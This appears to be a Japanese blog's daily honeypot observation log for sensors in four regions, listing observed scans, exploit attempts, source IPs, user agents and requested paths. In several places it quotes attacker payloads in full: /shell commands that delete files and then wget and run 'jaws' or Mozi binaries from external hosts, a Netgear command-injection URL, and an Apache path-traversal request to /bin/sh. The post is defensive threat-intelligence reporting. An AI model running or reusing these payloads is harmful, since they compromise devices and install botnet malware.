2023/02/22 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/02/22分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
Gh0stRATのような動き

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget  107.6.255.132/jaws;
sh /tmp/jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Nmap Scripting Engineによるスキャン行為
curlによるスキャン行為
/.gitへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  107.6.255.132/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://223.130.29.109:54830/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget update.rawupdater.cf/jaws;
sh /tmp/jaws

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Apache Tomcatへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
aiohttpによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  100.43.163.61/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：94 (前日比：-33)
US：総アクセス数：131 (前日比：20)
UK：総アクセス数：97 (前日比：-131)
SG：総アクセス数：134 (前日比：-29)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.220.207.214	United States
2	34.242.231.65	United States
1	35.170.203.26	United States
3	38.242.128.76	United States
6	43.154.141.71	Singapore
1	44.197.108.146	United States
1	45.33.80.243	United States
1	45.61.188.14	United States
3	45.79.181.104	United States
1	47.95.200.148	China
1	51.159.152.255	France
3	64.227.129.146	United States
1	66.240.205.34	United States
1	79.137.202.2	Russia
1	79.137.207.22	Russia
5	95.214.235.205	Ukraine
15	103.114.107.59	Vietnam
1	104.131.144.20	United States
1	104.192.0.50	United States
1	107.170.225.12	United States
2	109.237.97.180	Russia
2	109.237.98.226	Russia
7	135.125.217.54	France
6	135.125.246.110	France
1	138.68.141.7	United States
1	141.98.10.217	Lithuania
2	158.140.118.156	Palestine
1	161.35.213.111	United States
1	167.94.138.63	United States
1	167.172.175.228	United States
1	168.80.174.2	Seychelles
2	172.104.11.4	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.13	United States
1	173.212.212.214	Germany
2	183.136.225.44	China
1	184.174.36.45	United States
1	185.158.113.63	Russia
3	185.254.196.115	Ukraine
1	193.118.53.210	United States
1	195.37.190.89	Germany
1	198.199.100.111	United States
1	198.199.119.61	United States
1	198.235.24.17	United States
1	205.210.31.2	United States

UserAgent一覧

件数	UserAgent
26	`-`
5	`Go-http-client/1.1`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv60.0) Gecko/20100101 Firefox/60.0`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
1	`Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`Gh0st\xad`
1		`MGLNDD_18.179.20.5_80\n`
2		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x02`
14		`\x16\x03\x01`
25	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2020/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2021/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/agc/timeclock.php`	HTTP/1.1
1	GET	`/agent/timeclock.php`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/feed/`	HTTP/1.1
1	GET	`/goip/`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/metrics`	HTTP/1.1
1	GET	`/projector-calibration`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws`
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
4	GET	`/v1/agent/self`	HTTP/1.1\n
1	GET	`/v2/`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/ID3/license.txt`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
2	GET	`http[:]//ip-api.com/json/`	HTTP/1.1
6	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	8.218.60.57	Singapore
1	18.212.200.137	United States
1	23.83.131.86	United States
7	36.156.28.130	China
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
2	45.79.181.104	United States
1	45.79.181.179	United States
1	45.91.171.101	Israel
1	45.134.140.181	United Kingdom
2	45.227.254.49	Belize
28	51.79.29.48	Canada
1	79.137.202.185	Russia
1	79.137.207.22	Russia
7	85.31.44.146	Bulgaria
2	90.151.171.106	Russia
1	91.176.141.124	Belgium
1	92.118.39.82	Romania
1	92.255.85.183	Hong Kong
1	107.170.253.8	United States
2	109.206.243.235	Bulgaria
2	109.237.97.180	Russia
1	128.14.134.170	United States
3	134.122.124.34	United States
16	139.144.52.241	United States
3	139.162.204.149	Netherlands
1	152.89.196.211	Russia
2	158.140.118.156	Palestine
3	159.203.14.24	United States
2	162.142.125.212	United States
2	167.94.138.120	United States
3	167.99.176.82	United States
1	167.172.147.194	United States
2	167.248.133.119	United States
1	172.104.11.4	United States
2	172.104.11.34	United States
1	172.104.11.51	United States
1	172.105.128.13	United States
1	179.43.177.242	Panama
1	183.188.235.248	China
1	184.105.139.67	United States
1	185.158.113.63	Russia
3	185.180.143.140	Portugal
2	185.225.74.55	Bulgaria
1	185.246.220.98	Bulgaria
1	192.155.90.118	United States
1	192.241.206.15	United States
1	192.241.225.20	United States
1	193.42.33.249	Bulgaria
2	194.165.16.37	Panama
1	205.210.31.51	United States
1	223.130.29.109	India

UserAgent一覧

件数	UserAgent
47	`-`
3	`Go-http-client/1.1`
1	`Hello World`
2	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv60.0) Gecko/20100101 Firefox/60.0`
2	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
30	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
1	`Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3`
3	`Mozilla/5.0 zgrab/0.x`
11	`curl/7.54.0`
7	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
5		`\x03`
1		`\x16\x03\x01\x01H\x01`
4		`\x16\x03\x01\x02`
28		`\x16\x03\x01`
1		`\x16\x03`
1	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
32	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/7fKt`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/RYaQ`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/admin/.git/config`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/agc/timeclock.php`	HTTP/1.1
1	GET	`/agent/timeclock.php`	HTTP/1.1
1	GET	`/api/.git/config`	HTTP/1.1
1	GET	`/apis/apps/v1/namespaces/kube-system/daemonsets`	HTTP/1.1
1	GET	`/app/.git/config`	HTTP/1.1
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
3	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/demo/.git/config`	HTTP/1.1
1	GET	`/dev/.git/config`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/goip/`	HTTP/1.1
1	GET	`/index.jsa`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/nmaplowercheck1677017120`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws`
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//223[.]130[.]29[.]109:54830/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+update[.]rawupdater[.]cf/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/v1/agent/self`	HTTP/1.1\n
1	GET	`/web/.git/config`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/xVW7`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z73802194750Q1`	HTTP/1.1
2	GET	`http[:]//ip-api.com/json/`	HTTP/1.1
1	GET	`http[:]//query[.]cleaning/v4/headers.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.24.228.254	United States
1	43.138.88.28	China
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
2	46.60.91.159	Palestine
27	51.79.29.48	Canada
1	51.81.245.2	United States
1	51.159.152.255	France
1	64.112.72.170	United States
1	66.240.192.82	United States
1	79.137.202.185	Russia
2	90.151.171.106	Russia
2	90.151.171.108	Russia
2	92.118.39.82	Romania
1	107.170.226.19	United States
1	107.170.239.28	United States
2	109.237.97.180	Russia
2	109.237.98.226	Russia
1	128.14.141.34	United States
1	138.68.208.7	United States
1	143.244.50.172	United Kingdom
3	152.89.196.211	Russia
2	162.142.125.9	United States
2	167.94.138.60	United States
1	167.172.175.228	United States
7	168.80.174.2	Seychelles
3	170.64.168.132	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	179.43.177.242	Panama
1	185.158.113.63	Russia
2	185.246.220.98	Bulgaria
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.193.13	United States
1	192.241.210.43	United States
2	194.165.16.71	Panama
1	195.37.190.89	Germany
4	198.20.69.98	United States
1	198.235.24.30	United States
1	198.235.24.56	United States
1	216.218.206.66	United States
1	219.155.105.73	China

UserAgent一覧

件数	UserAgent
35	`-`
3	`Go-http-client/1.1`
2	`Hello World`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv60.0) Gecko/20100101 Firefox/60.0`
4	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
6	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
2		`\x16\x03\x01\x01H\x01`
23		`\x16\x03\x01`
1	CONNECT	`check.best-proxies[.]ru:443`	HTTP/1.1
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/agc/timeclock.php`	HTTP/1.1
1	GET	`/agent/timeclock.php`	HTTP/1.1
2	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/goip/`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/projector-calibration`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/v1/agent/self`	HTTP/1.1\n
1	GET	`http[:]//check[.]best-proxies.ru/ip.php?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z72612114222Q1`	HTTP/1.1
3	GET	`http[:]//ip-api.com/json/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/rpc`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
15	5.62.47.197	United Kingdom
1	20.55.53.144	United States
1	23.94.99.116	United States
2	45.9.110.186	Hong Kong
1	45.79.128.205	United States
1	45.79.172.21	United States
3	45.79.181.94	United States
2	45.79.181.104	United States
1	45.79.181.251	United States
29	51.79.29.48	Canada
1	54.166.52.78	United States
1	64.112.72.170	United States
3	68.183.120.234	United States
1	74.82.47.3	United States
1	77.240.38.19	Kazakhstan
1	79.137.202.2	Russia
1	92.118.39.82	Romania
12	95.142.127.17	Slovakia
2	109.237.97.180	Russia
2	109.237.98.226	Russia
1	120.86.255.185	China
1	139.59.180.216	Singapore
7	140.238.69.139	United States
2	152.89.196.211	Russia
2	162.142.125.8	United States
1	162.243.150.18	United States
1	162.243.152.27	United States
4	163.172.117.134	United Kingdom
9	164.52.0.100	China
1	165.22.202.124	United States
1	167.172.175.228	United States
1	169.197.143.220	Canada
1	172.104.11.51	United States
1	172.105.77.209	United States
1	172.105.89.161	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
1	179.43.177.242	Panama
2	183.136.225.32	China
2	185.156.72.27	Russia
1	185.158.113.63	Russia
1	185.225.74.55	Bulgaria
1	185.246.220.98	Bulgaria
1	192.241.206.104	United States
1	193.118.53.194	United States
2	194.165.16.10	Panama
1	198.199.112.109	United States
1	203.218.128.27	Hong Kong
1	205.210.31.24	United States
1	205.210.31.161	United States

UserAgent一覧

件数	UserAgent
47	`-`
2	`Go-http-client/1.1`
1	`Hello World`
1	`Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv60.0) Gecko/20100101 Firefox/60.0`
1	`Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1`
31	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
27	`python-requests/2.27.1`

リクエスト内容一覧

件数|Method|Request|Protocol :-|:-|:-|:- 1||-| 1||MGLNDD_13.67.44.234_80| 4||\x03| 2||\x16\x03\x01\x01H\x01| 2||\x16\x03\x01\x01|\x01 22||\x16\x03\x01| 1||\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159|X\xd4>\x12\x98\xc4<\xe0\x13\xcf 56|GET|/.env|HTTP/1.1 2|GET|/.git/config|HTTP/1.1 1|GET|/?XDEBUG_SESSION_START=phpstorm|HTTP/1.1 1|GET|/HNAP1|HTTP/1.1 1|GET|/IhsA5VcWzdGZraPnUYuxwL43MCM|HTTP/1.1 1|GET|/PSIA/index|HTTP/1.1 1|GET|/Telerik.Web.UI.WebResource.axd?type=rau|HTTP/1.1 1|GET|/_profiler/phpinfo|HTTP/1.1 1|GET|/actuator/gateway/routes|HTTP/1.1 2|GET|/blog/.env|HTTP/1.1 2|GET|/blog|HTTP/1.1 1|GET|/cgi-bin/downloadFlile.cgi|HTTP/1.1 1|GET|/client/get_targets|HTTP/1.1 1|GET|/druid/index.html|HTTP/1.1 6|GET|/favicon.ico|HTTP/1.1 1|GET|/goip/|HTTP/1.1 1|GET|/info.php|HTTP/1.1 1|GET|/manager/html|HTTP/1.1 1|GET|/manager/text/list|HTTP/1.1 1|GET|/php.php|HTTP/1.1 1|GET|/phpinfo.php|HTTP/1.1 1|GET|/phpinfo|HTTP/1.1 2|GET|/robots.txt|HTTP/1.1 1|GET|/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1|HTTP/1.0 1|GET|/shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws| 1|GET|/test.php|HTTP/1.1 3|GET|/v1/agent/self|HTTP/1.1 2|GET|http[:]//ip-api.com/json/|HTTP/1.1 3|POST|/boaform/admin/formLogin|HTTP/1.1 1|POST|/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh|HTTP/1.1 1|POST|/onvif/device_service|HTTP/1.1 1|PRI|*|HTTP/2.0 01